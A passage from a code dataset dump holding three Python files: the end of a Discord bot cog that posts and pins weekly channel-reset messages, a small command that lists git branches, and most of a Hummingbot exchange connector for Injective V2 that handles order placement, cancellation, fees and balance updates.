Channel Has Been Reset <:Crypt_Keeper:694324654227062825>\",\n description = (c_msg),\n colour = self.colour\n )\n if (rp_room[1] == 'CATEGORY'):\n for channel in self.bot.get_channel(rp_room[0]).channels:\n c_pin = await channel.send( embed = c_embed)\n print(rp_room[0],rp_room[1],rp_room[2],rp_room[3])\n if rp_room[3] == \"NO\":\n continue\n await c_pin.pin()\n else :\n c_pin = await self.bot.get_channel(rp_room[0]).send(embed = c_embed)\n if rp_room[3] == \"NO\":\n continue\n await c_pin.pin()\n except Exception as error:\n # // -- Log The Commands Use -- //\n await self.error_log_command(ctx,'weekly_reset',error)\n c_embed = discord.Embed(title = \"An Error Occured\",\n description = 'Error : {}\\n---\\n{}'.format(error,self.join_us_msg),\n colour = self.colour\n )\n c_file = discord.File(\"resources/Crypt_Keeper.gif\", filename=\"Crypt_Keeper.gif\")\n c_embed.set_thumbnail(url = \"attachment://Crypt_Keeper.gif\") \n await ctx.send(file = c_file, embed = c_embed)\n return\n\ndef setup(bot):\n bot.add_cog(Weekly_Reset(bot))\n","sub_path":"Weekly_Reset.py","file_name":"Weekly_Reset.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"167196720","text":"from util.decorators import requires\n\n\n@requires(\"git\")\ndef run(self, *arg):\n \"\"\"\n Print out a list of branches for this repository.\n \"\"\"\n branches = self.git.branches\n for branch in branches:\n self.console.blue(branch)\n","sub_path":"commands/git/branches.py","file_name":"branches.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"29442174","text":"import asyncio\nfrom collections import defaultdict\nfrom decimal import Decimal\nfrom enum import Enum\nfrom typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, Tuple, Union\n\nfrom async_timeout import timeout\n\nfrom hummingbot.connector.client_order_tracker import ClientOrderTracker\nfrom hummingbot.connector.constants import s_decimal_NaN\nfrom hummingbot.connector.exchange.injective_v2 import (\n injective_constants as CONSTANTS,\n injective_v2_web_utils as web_utils,\n)\nfrom hummingbot.connector.exchange.injective_v2.injective_events import InjectiveEvent\nfrom hummingbot.connector.exchange.injective_v2.injective_v2_api_order_book_data_source import (\n InjectiveV2APIOrderBookDataSource,\n)\nfrom hummingbot.connector.exchange.injective_v2.injective_v2_utils import InjectiveConfigMap\nfrom hummingbot.connector.exchange_py_base import ExchangePyBase\nfrom hummingbot.connector.gateway.gateway_in_flight_order import GatewayInFlightOrder\nfrom hummingbot.connector.gateway.gateway_order_tracker import GatewayOrderTracker\nfrom hummingbot.connector.trading_rule import TradingRule\nfrom hummingbot.connector.utils import combine_to_hb_trading_pair, get_new_client_order_id\nfrom hummingbot.core.api_throttler.data_types import RateLimit\nfrom hummingbot.core.data_type.cancellation_result import CancellationResult\nfrom hummingbot.core.data_type.common import OrderType, TradeType\nfrom hummingbot.core.data_type.in_flight_order import OrderState, OrderUpdate, TradeUpdate\nfrom hummingbot.core.data_type.limit_order import LimitOrder\nfrom hummingbot.core.data_type.market_order import MarketOrder\nfrom hummingbot.core.data_type.order_book_tracker_data_source import OrderBookTrackerDataSource\nfrom hummingbot.core.data_type.trade_fee import TradeFeeBase, TradeFeeSchema\nfrom hummingbot.core.data_type.user_stream_tracker_data_source import UserStreamTrackerDataSource\nfrom hummingbot.core.event.event_forwarder import EventForwarder\nfrom hummingbot.core.event.events import AccountEvent, BalanceUpdateEvent, MarketEvent\nfrom hummingbot.core.network_iterator import NetworkStatus\nfrom hummingbot.core.utils.async_utils import safe_ensure_future\nfrom hummingbot.core.utils.estimate_fee import build_trade_fee\nfrom hummingbot.core.web_assistant.auth import AuthBase\nfrom hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory\n\nif TYPE_CHECKING:\n from hummingbot.client.config.config_helpers import ClientConfigAdapter\n\n\nclass InjectiveV2Exchange(ExchangePyBase):\n web_utils = web_utils\n\n def __init__(\n self,\n client_config_map: \"ClientConfigAdapter\",\n connector_configuration: InjectiveConfigMap,\n trading_pairs: Optional[List[str]] = None,\n trading_required: bool = True,\n **kwargs,\n ):\n self._orders_processing_delta_time = 0.5\n\n self._trading_required = trading_required\n self._trading_pairs = trading_pairs\n self._data_source = connector_configuration.create_data_source()\n\n super().__init__(client_config_map=client_config_map)\n self._data_source.configure_throttler(throttler=self._throttler)\n self._forwarders = []\n self._configure_event_forwarders()\n self._latest_polled_order_fill_time: float = self._time()\n self._orders_transactions_check_task: Optional[asyncio.Task] = None\n self._last_received_message_timestamp = 0\n self._orders_queued_to_create: List[GatewayInFlightOrder] = []\n self._orders_queued_to_cancel: List[GatewayInFlightOrder] = []\n\n self._orders_transactions_check_task = None\n self._queued_orders_task = None\n self._all_trading_events_queue = asyncio.Queue()\n\n @property\n def name(self) -> str:\n return CONSTANTS.EXCHANGE_NAME\n\n @property\n def authenticator(self) -> AuthBase:\n return None\n\n @property\n def rate_limits_rules(self) -> List[RateLimit]:\n return CONSTANTS.RATE_LIMITS\n\n @property\n def domain(self) -> str:\n return self._data_source.network_name\n\n @property\n def client_order_id_max_length(self) -> int:\n return None\n\n @property\n def client_order_id_prefix(self) -> str:\n return \"\"\n\n @property\n def trading_rules_request_path(self) -> str:\n raise NotImplementedError\n\n @property\n def trading_pairs_request_path(self) -> str:\n raise NotImplementedError\n\n @property\n def check_network_request_path(self) -> str:\n raise NotImplementedError\n\n @property\n def trading_pairs(self) -> List[str]:\n return self._trading_pairs\n\n @property\n def is_cancel_request_in_exchange_synchronous(self) -> bool:\n return False\n\n @property\n def is_trading_required(self) -> bool:\n return self._trading_required\n\n @property\n def status_dict(self) -> Dict[str, bool]:\n status = super().status_dict\n status[\"data_source_initialized\"] = self._data_source.is_started()\n return status\n\n async def start_network(self):\n await super().start_network()\n\n market_ids = [\n await self.exchange_symbol_associated_to_pair(trading_pair=trading_pair)\n for trading_pair in self._trading_pairs\n ]\n await self._data_source.start(market_ids=market_ids)\n\n if self.is_trading_required:\n self._orders_transactions_check_task = safe_ensure_future(self._check_orders_transactions())\n self._queued_orders_task = safe_ensure_future(self._process_queued_orders())\n\n async def stop_network(self):\n \"\"\"\n This function is executed when the connector is stopped. It performs a general cleanup and stops all background\n tasks that require the connection with the exchange to work.\n \"\"\"\n await super().stop_network()\n await self._data_source.stop()\n self._forwarders = []\n if self._orders_transactions_check_task is not None:\n self._orders_transactions_check_task.cancel()\n self._orders_transactions_check_task = None\n if self._queued_orders_task is not None:\n self._queued_orders_task.cancel()\n self._queued_orders_task = None\n\n def supported_order_types(self) -> List[OrderType]:\n return self._data_source.supported_order_types()\n\n def start_tracking_order(\n self,\n order_id: str,\n exchange_order_id: Optional[str],\n trading_pair: str,\n trade_type: TradeType,\n price: Decimal,\n amount: Decimal,\n order_type: OrderType,\n **kwargs,\n ):\n self._order_tracker.start_tracking_order(\n GatewayInFlightOrder(\n client_order_id=order_id,\n exchange_order_id=exchange_order_id,\n trading_pair=trading_pair,\n order_type=order_type,\n trade_type=trade_type,\n amount=amount,\n price=price,\n creation_timestamp=self.current_timestamp,\n )\n )\n\n def batch_order_create(self, orders_to_create: List[Union[MarketOrder, LimitOrder]]) -> List[LimitOrder]:\n \"\"\"\n Issues a batch order creation as a single API request for exchanges that implement this feature. The default\n implementation of this method is to send the requests discretely (one by one).\n :param orders_to_create: A list of LimitOrder or MarketOrder objects representing the orders to create. The order IDs\n can be blanc.\n :returns: A tuple composed of LimitOrder or MarketOrder objects representing the created orders, complete with the generated\n order IDs.\n \"\"\"\n orders_with_ids_to_create = []\n for order in orders_to_create:\n client_order_id = get_new_client_order_id(\n is_buy=order.is_buy,\n trading_pair=order.trading_pair,\n hbot_order_id_prefix=self.client_order_id_prefix,\n max_id_len=self.client_order_id_max_length,\n )\n orders_with_ids_to_create.append(order.copy_with_id(client_order_id=client_order_id))\n safe_ensure_future(self._execute_batch_order_create(orders_to_create=orders_with_ids_to_create))\n return orders_with_ids_to_create\n\n def batch_order_cancel(self, orders_to_cancel: List[LimitOrder]):\n \"\"\"\n Issues a batch order cancelation as a single API request for exchanges that implement this feature. The default\n implementation of this method is to send the requests discretely (one by one).\n :param orders_to_cancel: A list of the orders to cancel.\n \"\"\"\n safe_ensure_future(coro=self._execute_batch_cancel(orders_to_cancel=orders_to_cancel))\n\n async def cancel_all(self, timeout_seconds: float) -> List[CancellationResult]:\n \"\"\"\n Cancels all currently active orders. The cancellations are performed in parallel tasks.\n\n :param timeout_seconds: the maximum time (in seconds) the cancel logic should run\n\n :return: a list of CancellationResult instances, one for each of the orders to be cancelled\n \"\"\"\n incomplete_orders = {}\n limit_orders = []\n successful_cancellations = []\n\n for order in self.in_flight_orders.values():\n if not order.is_done:\n incomplete_orders[order.client_order_id] = order\n limit_orders.append(order.to_limit_order())\n\n if len(limit_orders) > 0:\n try:\n async with timeout(timeout_seconds):\n cancellation_results = await self._execute_batch_cancel(orders_to_cancel=limit_orders)\n for cr in cancellation_results:\n if cr.success:\n del incomplete_orders[cr.order_id]\n successful_cancellations.append(CancellationResult(cr.order_id, True))\n except Exception:\n self.logger().network(\n \"Unexpected error cancelling orders.\",\n exc_info=True,\n app_warning_msg=\"Failed to cancel order. Check API key and network connection.\"\n )\n failed_cancellations = [CancellationResult(oid, False) for oid in incomplete_orders.keys()]\n return successful_cancellations + failed_cancellations\n\n async def cancel_all_subaccount_orders(self):\n markets_ids = [await self.exchange_symbol_associated_to_pair(trading_pair=trading_pair)\n for trading_pair in self.trading_pairs]\n await self._data_source.cancel_all_subaccount_orders(spot_markets_ids=markets_ids)\n\n async def check_network(self) -> NetworkStatus:\n \"\"\"\n Checks connectivity with the exchange using the API\n \"\"\"\n try:\n status = await self._data_source.check_network()\n except asyncio.CancelledError:\n raise\n except Exception:\n status = NetworkStatus.NOT_CONNECTED\n return status\n\n def trigger_event(self, event_tag: Enum, message: any):\n # Reimplemented because Injective connector has trading pairs with modified token names, because market tickers\n # are not always unique.\n # We need to change the original trading pair in all events to the real tokens trading pairs to not impact the\n # bot events processing\n trading_pair = getattr(message, \"trading_pair\", None)\n if trading_pair is not None:\n new_trading_pair = self._data_source.real_tokens_spot_trading_pair(unique_trading_pair=trading_pair)\n if isinstance(message, tuple):\n message = message._replace(trading_pair=new_trading_pair)\n else:\n setattr(message, \"trading_pair\", new_trading_pair)\n\n super().trigger_event(event_tag=event_tag, message=message)\n\n def _is_request_exception_related_to_time_synchronizer(self, request_exception: Exception) -> bool:\n return False\n\n def _is_order_not_found_during_status_update_error(self, status_update_exception: Exception) -> bool:\n return CONSTANTS.ORDER_NOT_FOUND_ERROR_MESSAGE in str(status_update_exception)\n\n def _is_order_not_found_during_cancelation_error(self, cancelation_exception: Exception) -> bool:\n # For Injective the cancelation is done by sending a transaction to the chain.\n # The cancel request is not validated until the transaction is included in a block, and so this does not apply\n return False\n\n async def _place_cancel(self, order_id: str, tracked_order: GatewayInFlightOrder):\n # Not required because of _execute_order_cancel redefinition\n raise NotImplementedError\n\n async def _execute_order_cancel(self, order: GatewayInFlightOrder) -> str:\n # Order cancelation requests for single orders are queued to be executed in batch if possible\n self._orders_queued_to_cancel.append(order)\n return None\n\n async def _place_order(self, order_id: str, trading_pair: str, amount: Decimal, trade_type: TradeType,\n order_type: OrderType, price: Decimal, **kwargs) -> Tuple[str, float]:\n # Not required because of _place_order_and_process_update redefinition\n raise NotImplementedError\n\n async def _create_order(self,\n trade_type: TradeType,\n order_id: str,\n trading_pair: str,\n amount: Decimal,\n order_type: OrderType,\n price: Optional[Decimal] = None,\n **kwargs):\n \"\"\"\n Creates an order in the exchange using the parameters to configure it\n\n :param trade_type: the side of the order (BUY of SELL)\n :param order_id: the id that should be assigned to the order (the client id)\n :param trading_pair: the token pair to operate with\n :param amount: the order amount\n :param order_type: the type of order to create (MARKET, LIMIT, LIMIT_MAKER)\n :param price: the order price\n \"\"\"\n try:\n if price is None:\n calculated_price = self.get_price_for_volume(\n trading_pair=trading_pair,\n is_buy=trade_type == TradeType.BUY,\n volume=amount,\n ).result_price\n calculated_price = self.quantize_order_price(trading_pair, calculated_price)\n else:\n calculated_price = price\n\n await super()._create_order(\n trade_type=trade_type,\n order_id=order_id,\n trading_pair=trading_pair,\n amount=amount,\n order_type=order_type,\n price=calculated_price,\n ** kwargs\n )\n\n except asyncio.CancelledError:\n raise\n except Exception as ex:\n self._on_order_failure(\n order_id=order_id,\n trading_pair=trading_pair,\n amount=amount,\n trade_type=trade_type,\n order_type=order_type,\n price=price,\n exception=ex,\n **kwargs,\n )\n\n async def _place_order_and_process_update(self, order: GatewayInFlightOrder, **kwargs) -> str:\n # Order creation requests for single orders are queued to be executed in batch if possible\n self._orders_queued_to_create.append(order)\n return None\n\n async def _execute_batch_order_create(self, orders_to_create: List[Union[MarketOrder, LimitOrder]]):\n inflight_orders_to_create = []\n for order in orders_to_create:\n valid_order = await self._start_tracking_and_validate_order(\n trade_type=TradeType.BUY if order.is_buy else TradeType.SELL,\n order_id=order.client_order_id,\n trading_pair=order.trading_pair,\n amount=order.quantity,\n order_type=order.order_type(),\n price=order.price,\n )\n if valid_order is not None:\n inflight_orders_to_create.append(valid_order)\n await self._execute_batch_inflight_order_create(inflight_orders_to_create=inflight_orders_to_create)\n\n async def _execute_batch_inflight_order_create(self, inflight_orders_to_create: List[GatewayInFlightOrder]):\n try:\n place_order_results = await self._data_source.create_orders(\n spot_orders=inflight_orders_to_create\n )\n for place_order_result, in_flight_order in (\n zip(place_order_results, inflight_orders_to_create)\n ):\n if place_order_result.exception:\n self._on_order_creation_failure(\n order_id=in_flight_order.client_order_id,\n trading_pair=in_flight_order.trading_pair,\n amount=in_flight_order.amount,\n trade_type=in_flight_order.trade_type,\n order_type=in_flight_order.order_type,\n price=in_flight_order.price,\n exception=place_order_result.exception,\n )\n else:\n self._update_order_after_creation_success(\n exchange_order_id=place_order_result.exchange_order_id,\n order=in_flight_order,\n update_timestamp=self.current_timestamp,\n misc_updates=place_order_result.misc_updates,\n )\n except asyncio.CancelledError:\n raise\n except Exception as ex:\n self.logger().network(\"Batch order create failed.\")\n for order in inflight_orders_to_create:\n self._on_order_creation_failure(\n order_id=order.client_order_id,\n trading_pair=order.trading_pair,\n amount=order.amount,\n trade_type=order.trade_type,\n order_type=order.order_type,\n price=order.price,\n exception=ex,\n )\n\n async def _start_tracking_and_validate_order(\n self,\n trade_type: TradeType,\n order_id: str,\n trading_pair: str,\n amount: Decimal,\n order_type: OrderType,\n price: Optional[Decimal] = None,\n **kwargs\n ) -> Optional[GatewayInFlightOrder]:\n trading_rule = self._trading_rules[trading_pair]\n\n if price is None:\n calculated_price = self.get_price_for_volume(\n trading_pair=trading_pair,\n is_buy=trade_type == TradeType.BUY,\n volume=amount,\n ).result_price\n calculated_price = self.quantize_order_price(trading_pair, calculated_price)\n else:\n calculated_price = price\n\n price = self.quantize_order_price(trading_pair, calculated_price)\n amount = self.quantize_order_amount(trading_pair=trading_pair, amount=amount)\n\n self.start_tracking_order(\n order_id=order_id,\n exchange_order_id=None,\n trading_pair=trading_pair,\n order_type=order_type,\n trade_type=trade_type,\n price=price,\n amount=amount,\n **kwargs,\n )\n order = self._order_tracker.active_orders[order_id]\n\n if order_type not in self.supported_order_types():\n self.logger().error(f\"{order_type} is not in the list of supported order types\")\n self._update_order_after_creation_failure(order_id=order_id, trading_pair=trading_pair)\n order = None\n elif amount < trading_rule.min_order_size:\n self.logger().warning(f\"{trade_type.name.title()} order amount {amount} is lower than the minimum order\"\n f\" size {trading_rule.min_order_size}. The order will not be created.\")\n self._update_order_after_creation_failure(order_id=order_id, trading_pair=trading_pair)\n order = None\n elif price is not None and amount * price < trading_rule.min_notional_size:\n self.logger().warning(f\"{trade_type.name.title()} order notional {amount * price} is lower than the \"\n f\"minimum notional size {trading_rule.min_notional_size}. \"\n \"The order will not be created.\")\n self._update_order_after_creation_failure(order_id=order_id, trading_pair=trading_pair)\n order = None\n\n return order\n\n def _update_order_after_creation_success(\n self,\n exchange_order_id: Optional[str],\n order: GatewayInFlightOrder,\n update_timestamp: float,\n misc_updates: Optional[Dict[str, Any]] = None\n ):\n order_update: OrderUpdate = OrderUpdate(\n client_order_id=order.client_order_id,\n exchange_order_id=exchange_order_id,\n trading_pair=order.trading_pair,\n update_timestamp=update_timestamp,\n new_state=order.current_state,\n misc_updates=misc_updates,\n )\n self._order_tracker.process_order_update(order_update)\n\n def _on_order_creation_failure(\n self,\n order_id: str,\n trading_pair: str,\n amount: Decimal,\n trade_type: TradeType,\n order_type: OrderType,\n price: Optional[Decimal],\n exception: Exception,\n ):\n self.logger().network(\n f\"Error submitting {trade_type.name.lower()} {order_type.name.upper()} order to {self.name_cap} for \"\n f\"{amount} {trading_pair} {price}.\",\n exc_info=exception,\n app_warning_msg=f\"Failed to submit buy order to {self.name_cap}. Check API key and network connection.\"\n )\n self._update_order_after_creation_failure(order_id=order_id, trading_pair=trading_pair)\n\n def _update_order_after_creation_failure(self, order_id: str, trading_pair: str):\n order_update: OrderUpdate = OrderUpdate(\n client_order_id=order_id,\n trading_pair=trading_pair,\n update_timestamp=self.current_timestamp,\n new_state=OrderState.FAILED,\n )\n self._order_tracker.process_order_update(order_update)\n\n async def _execute_batch_cancel(self, orders_to_cancel: List[LimitOrder]) -> List[CancellationResult]:\n results = []\n tracked_orders_to_cancel = []\n\n for order in orders_to_cancel:\n tracked_order = self._order_tracker.all_updatable_orders.get(order.client_order_id)\n if tracked_order is not None:\n tracked_orders_to_cancel.append(tracked_order)\n else:\n results.append(CancellationResult(order_id=order.client_order_id, success=False))\n\n if len(tracked_orders_to_cancel) > 0:\n results.extend(await self._execute_batch_order_cancel(orders_to_cancel=tracked_orders_to_cancel))\n\n return results\n\n async def _execute_batch_order_cancel(self, orders_to_cancel: List[GatewayInFlightOrder]) -> List[CancellationResult]:\n try:\n cancel_order_results = await self._data_source.cancel_orders(spot_orders=orders_to_cancel)\n cancelation_results = []\n for cancel_order_result in cancel_order_results:\n success = True\n if cancel_order_result.not_found:\n self.logger().warning(\n f\"Failed to cancel the order {cancel_order_result.client_order_id} due to the order\"\n f\" not being found.\"\n )\n await self._order_tracker.process_order_not_found(\n client_order_id=cancel_order_result.client_order_id\n )\n success = False\n elif cancel_order_result.exception is not None:\n self.logger().error(\n f\"Failed to cancel order {cancel_order_result.client_order_id}\",\n exc_info=cancel_order_result.exception,\n )\n success = False\n else:\n order_update: OrderUpdate = OrderUpdate(\n client_order_id=cancel_order_result.client_order_id,\n trading_pair=cancel_order_result.trading_pair,\n update_timestamp=self.current_timestamp,\n new_state=(OrderState.CANCELED\n if self.is_cancel_request_in_exchange_synchronous\n else OrderState.PENDING_CANCEL),\n misc_updates=cancel_order_result.misc_updates,\n )\n self._order_tracker.process_order_update(order_update)\n cancelation_results.append(\n CancellationResult(order_id=cancel_order_result.client_order_id, success=success)\n )\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().error(\n f\"Failed to cancel orders {', '.join([o.client_order_id for o in orders_to_cancel])}\",\n exc_info=True,\n )\n cancelation_results = [\n CancellationResult(order_id=order.client_order_id, success=False)\n for order in orders_to_cancel\n ]\n\n return cancelation_results\n\n def _update_order_after_cancelation_success(self, order: GatewayInFlightOrder):\n order_update: OrderUpdate = OrderUpdate(\n client_order_id=order.client_order_id,\n trading_pair=order.trading_pair,\n update_timestamp=self.current_timestamp,\n new_state=(OrderState.CANCELED\n if self.is_cancel_request_in_exchange_synchronous\n else OrderState.PENDING_CANCEL),\n )\n self._order_tracker.process_order_update(order_update)\n\n def _get_fee(self, base_currency: str, quote_currency: str, order_type: OrderType, order_side: TradeType,\n amount: Decimal, price: Decimal = s_decimal_NaN,\n is_maker: Optional[bool] = None) -> TradeFeeBase:\n is_maker = is_maker or (order_type is OrderType.LIMIT_MAKER)\n trading_pair = combine_to_hb_trading_pair(base=base_currency, quote=quote_currency)\n if trading_pair in self._trading_fees:\n fee_schema: TradeFeeSchema = self._trading_fees[trading_pair]\n fee_rate = fee_schema.maker_percent_fee_decimal if is_maker else fee_schema.taker_percent_fee_decimal\n fee = TradeFeeBase.new_spot_fee(\n fee_schema=fee_schema,\n trade_type=order_side,\n percent=fee_rate,\n percent_token=fee_schema.percent_fee_token,\n )\n else:\n fee = build_trade_fee(\n self.name,\n is_maker,\n base_currency=base_currency,\n quote_currency=quote_currency,\n order_type=order_type,\n order_side=order_side,\n amount=amount,\n price=price,\n )\n return fee\n\n async def _update_trading_fees(self):\n self._trading_fees = await self._data_source.get_spot_trading_fees()\n\n async def _user_stream_event_listener(self):\n while True:\n try:\n event_message = await self._all_trading_events_queue.get()\n channel = event_message[\"channel\"]\n event_data = event_message[\"data\"]\n\n if channel == \"transaction\":\n transaction_hash = event_data[\"hash\"]\n await self._check_created_orders_status_for_transaction(transaction_hash=transaction_hash)\n elif channel == \"trade\":\n trade_update = event_data\n tracked_order = self._order_tracker.all_fillable_orders_by_exchange_order_id.get(\n trade_update.exchange_order_id\n )\n if tracked_order is not None:\n new_trade_update = TradeUpdate(\n trade_id=trade_update.trade_id,\n client_order_id=tracked_order.client_order_id,\n exchange_order_id=trade_update.exchange_order_id,\n trading_pair=trade_update.trading_pair,\n fill_timestamp=trade_update.fill_timestamp,\n fill_price=trade_update.fill_price,\n fill_base_amount=trade_update.fill_base_amount,\n fill_quote_amount=trade_update.fill_quote_amount,\n fee=trade_update.fee,\n is_taker=trade_update.is_taker,\n )\n self._order_tracker.process_trade_update(new_trade_update)\n elif channel == \"order\":\n order_update = event_data\n tracked_order = self._order_tracker.all_updatable_orders_by_exchange_order_id.get(\n order_update.exchange_order_id)\n if tracked_order is not None:\n new_order_update = OrderUpdate(\n trading_pair=order_update.trading_pair,\n update_timestamp=order_update.update_timestamp,\n new_state=order_update.new_state,\n client_order_id=tracked_order.client_order_id,\n exchange_order_id=order_update.exchange_order_id,\n misc_updates=order_update.misc_updates,\n )\n self._order_tracker.process_order_update(order_update=new_order_update)\n elif channel == \"balance\":\n if event_data.total_balance is not None:\n self._account_balances[event_data.asset_name] = event_data.total_balance\n if event_data.available_balance is not None:\n self._account_available_balances[event_data.asset_name] = event_data.available_balance\n\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().exception(\"Unexpected error in user stream listener loop\")\n\n async def _format_trading_rules(self, exchange_info_dict: Dict[str, Any]) -> List[TradingRule]:\n # Not used in Injective\n raise NotImplementedError # pragma: no cover\n\n async def _update_trading_rules(self):\n await self._data_source.update_markets()\n await self._initialize_trading_pair_symbol_map()\n trading_rules_list = await self._data_source.spot_trading_rules()\n trading_rules = {}\n for trading_rule in trading_rules_list:\n trading_rules[trading_rule.trading_pair] = trading_rule\n self._trading_rules.clear()\n self._trading_rules.update(trading_rules)\n\n async def _update_balances(self):\n all_balances = await self._data_source.all_account_balances()\n\n self._account_available_balances.clear()\n self._account_balances.clear()\n\n for token, token_balance_info in all_balances.items():\n self._account_balances[token] = token_balance_info[\"total_balance\"]\n self._account_available_balances[token] = token_balance_info[\"available_balance\"]\n\n async def _all_trade_updates_for_order(self, order: GatewayInFlightOrder) -> List[TradeUpdate]:\n # Not required because of _update_orders_fills redefinition\n raise NotImplementedError\n\n async def _update_orders_fills(self, orders: List[GatewayInFlightOrder]):\n oldest_order_creation_time = self.current_timestamp\n all_market_ids = set()\n orders_by_hash = {}\n\n for order in orders:\n oldest_order_creation_time = min(oldest_order_creation_time, order.creation_timestamp)\n all_market_ids.add(await self.exchange_symbol_associated_to_pair(trading_pair=order.trading_pair))\n if order.exchange_order_id is not None:\n orders_by_hash[order.exchange_order_id] = order\n\n try:\n start_time = min(oldest_order_creation_time, self._latest_polled_order_fill_time)\n trade_updates = await self._data_source.spot_trade_updates(market_ids=all_market_ids, start_time=start_time)\n for trade_update in trade_updates:\n tracked_order = orders_by_hash.get(trade_update.exchange_order_id)\n if tracked_order is not None:\n new_trade_update = TradeUpdate(\n trade_id=trade_update.trade_id,\n client_order_id=tracked_order.client_order_id,\n exchange_order_id=trade_update.exchange_order_id,\n trading_pair=trade_update.trading_pair,\n fill_timestamp=trade_update.fill_timestamp,\n fill_price=trade_update.fill_price,\n fill_base_amount=trade_update.fill_base_amount,\n fill_quote_amount=trade_update.fill_quote_amount,\n fee=trade_update.fee,\n is_taker=trade_update.is_taker,\n )\n self._latest_polled_order_fill_time = max(self._latest_polled_order_fill_time, trade_update.fill_timestamp)\n self._order_tracker.process_trade_update(new_trade_update)\n except asyncio.CancelledError:\n raise\n except Exception as ex:\n self.logger().warning(\n f\"Failed to fetch trade updates. Error: {ex}\",\n exc_info=ex,\n )\n\n async def _request_order_status(self, tracked_order: GatewayInFlightOrder) -> OrderUpdate:\n # Not required due to the redefinition of _update_orders_with_error_handler\n raise NotImplementedError\n\n async def _update_orders_with_error_handler(self, orders: List[GatewayInFlightOrder], error_handler: Callable):\n oldest_order_creation_time = self.current_timestamp\n all_market_ids = set()\n orders_by_hash = {}\n\n for order in orders:\n oldest_order_creation_time = min(oldest_order_creation_time, order.creation_timestamp)\n all_market_ids.add(await self.exchange_symbol_associated_to_pair(trading_pair=order.trading_pair))\n if order.exchange_order_id is not None:\n orders_by_hash[order.exchange_order_id] = order\n\n try:\n order_updates = await self._data_source.spot_order_updates(\n market_ids=all_market_ids,\n start_time=oldest_order_creation_time - self.LONG_POLL_INTERVAL\n )\n\n for order_update in order_updates:\n tracked_order = orders_by_hash.get(order_update.exchange_order_id)\n if tracked_order is not None:\n try:\n new_order_update = OrderUpdate(\n trading_pair=order_update.trading_pair,\n update_timestamp=order_update.update_timestamp,\n new_state=order_update.new_state,\n client_order_id=tracked_order.client_order_id,\n exchange_order_id=order_update.exchange_order_id,\n misc_updates=order_update.misc_updates,\n )\n\n if tracked_order.current_state == OrderState.PENDING_CREATE and new_order_update.new_state != OrderState.OPEN:\n open_update = OrderUpdate(\n trading_pair=order_update.trading_pair,\n update_timestamp=order_update.update_timestamp,\n new_state=OrderState.OPEN,\n client_order_id=tracked_order.client_order_id,\n exchange_order_id=order_update.exchange_order_id,\n misc_updates=order_update.misc_updates,\n )\n self._order_tracker.process_order_update(open_update)\n\n del orders_by_hash[order_update.exchange_order_id]\n self._order_tracker.process_order_update(new_order_update)\n except asyncio.CancelledError:\n raise\n except Exception as ex:\n await error_handler(tracked_order, ex)\n\n if len(orders_by_hash) > 0:\n # await self._data_source.check_order_hashes_synchronization(orders=orders_by_hash.values())\n for order in orders_by_hash.values():\n not_found_error = RuntimeError(\n f\"There was a problem updating order {order.client_order_id} \"\n f\"({CONSTANTS.ORDER_NOT_FOUND_ERROR_MESSAGE})\"\n )\n await error_handler(order, not_found_error)\n except asyncio.CancelledError:\n raise\n except Exception as request_error:\n for order in orders_by_hash.values():\n await error_handler(order, request_error)\n\n def _create_web_assistants_factory(self) -> WebAssistantsFactory:\n return WebAssistantsFactory(throttler=self._throttler)\n\n def _create_order_tracker(self) -> ClientOrderTracker:\n tracker = GatewayOrderTracker(connector=self)\n return tracker\n\n def _create_order_book_data_source(self) -> OrderBookTrackerDataSource:\n return InjectiveV2APIOrderBookDataSource(\n trading_pairs=self.trading_pairs,\n connector=self,\n data_source=self._data_source,\n domain=self.domain\n )\n\n def _create_user_stream_data_source(self) -> UserStreamTrackerDataSource:\n # Not used in Injective\n raise NotImplementedError # pragma: no cover\n\n def _is_user_stream_initialized(self):\n # Injective does not have private websocket endpoints\n return self._data_source.is_started()\n\n def _create_user_stream_tracker(self):\n # Injective does not use a tracker for the private streams\n return None\n\n def _create_user_stream_tracker_task(self):\n # Injective does not use a tracker for the private streams\n return None\n\n def _initialize_trading_pair_symbols_from_exchange_info(self, exchange_info: Dict[str, Any]):\n # Not used in Injective\n raise NotImplementedError() # pragma: no cover\n\n async def _initialize_trading_pair_symbol_map(self):\n exchange_info = None\n try:\n mapping = await self._data_source.spot_market_and_trading_pair_map()\n self._set_trading_pair_symbol_map(mapping)\n except Exception:\n self.logger().exception(\"There was an error requesting exchange info.\")\n return exchange_info\n\n def _configure_event_forwarders(self):\n event_forwarder = EventForwarder(to_function=self._process_user_trade_update)\n self._forwarders.append(event_forwarder)\n self._data_source.add_listener(event_tag=MarketEvent.TradeUpdate, listener=event_forwarder)\n\n event_forwarder = EventForwarder(to_function=self._process_user_order_update)\n self._forwarders.append(event_forwarder)\n self._data_source.add_listener(event_tag=MarketEvent.OrderUpdate, listener=event_forwarder)\n\n event_forwarder = EventForwarder(to_function=self._process_balance_event)\n self._forwarders.append(event_forwarder)\n self._data_source.add_listener(event_tag=AccountEvent.BalanceEvent, listener=event_forwarder)\n\n event_forwarder = EventForwarder(to_function=self._process_transaction_event)\n self._forwarders.append(event_forwarder)\n self._data_source.add_listener(event_tag=InjectiveEvent.ChainTransactionEvent, listener=event_forwarder)\n\n def _process_balance_event(self, event: BalanceUpdateEvent):\n self._last_received_message_timestamp = self._time()\n self._all_trading_events_queue.put_nowait(\n {\"channel\": \"balance\", \"data\": event}\n )\n\n def _process_user_order_update(self, order_update: OrderUpdate):\n self._last_received_message_timestamp = self._time()\n self._all_trading_events_queue.put_nowait(\n {\"channel\": \"order\", \"data\": order_update}\n )\n\n def _process_user_trade_update(self, trade_update: TradeUpdate):\n self._last_received_message_timestamp = self._time()\n self._all_trading_events_queue.put_nowait(\n {\"channel\": \"trade\", \"data\": trade_update}\n )\n\n def _process_transaction_event(self, transaction_event: Dict[str, Any]):\n self._last_received_message_timestamp = self._time()\n self._all_trading_events_queue.put_nowait(\n {\"channel\": \"transaction\", \"data\": transaction_event}\n )\n\n async def _check_orders_transactions(self):\n while True:\n try:\n await self._check_orders_creation_transactions()\n await self._sleep(CONSTANTS.TRANSACTIONS_CHECK_INTERVAL)\n except 